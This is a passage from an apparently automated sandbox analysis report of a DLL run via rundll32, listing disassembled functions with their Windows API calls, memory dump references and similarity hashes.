                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                      • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                      • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                      • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                      • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                        • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                      • String ID: V&'
                                                                                                                      • API String ID: 1067611704-802299783
                                                                                                                      • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                      • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001390 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                        • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2004563703-0
                                                                                                                      • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                      • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                      • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                      • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017632 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreate$Open
                                                                                                                      • String ID: software
                                                                                                                      • API String ID: 1740278721-2010147023
                                                                                                                      • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                      • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001180 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                        • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                        • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                        • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                        • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task_impl$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1204490572-0
                                                                                                                      • Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                      • Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
                                                                                                                      • Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                      • Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020A8E Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                        • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                        • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 356813703-0
                                                                                                                      • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                      • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020EEA Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Brush
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2798902688-0
                                                                                                                      • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                      • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002981B Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                        • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                        • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                        • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 63617653-0
                                                                                                                      • Opcode ID: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                      • Instruction ID: 8f7f5911e4d3fd52506e0ebb541b856e7b36a578254e0be009e80c36fe1d785e
                                                                                                                      • Opcode Fuzzy Hash: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                      • Instruction Fuzzy Hash: 13F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002D1E9 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                      • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                        • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                      • _memset.LIBCMT ref: 1002D2F2
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4021759052-0
                                                                                                                      • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                      • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002D5D0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002D5FF
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                        • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString$H_prolog3_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842698744-0
                                                                                                                      • Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                      • Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
                                                                                                                      • Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                      • Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100169E1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                        • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                        • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                        • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                      • SendMessageA.USER32 ref: 10016A5B
                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1877664794-0
                                                                                                                      • Opcode ID: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                      • Instruction ID: f13ef48dc5fb0c484cec2fa7b3f992f2dc6d3b1b42596072abe369902371925a
                                                                                                                      • Opcode Fuzzy Hash: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                      • Instruction Fuzzy Hash: 3B415B72A00258DBEB20CFA4CC81BDD76A8EF09350F614119E949AB281E770D9848F52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016936 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                      • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                      • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                      • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 670545878-0
                                                                                                                      • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                      • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020559 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                      • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                      • GetWindowRect.USER32 ref: 1002059C
                                                                                                                      • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                      • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1315500227-0
                                                                                                                      • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                      • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001D992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
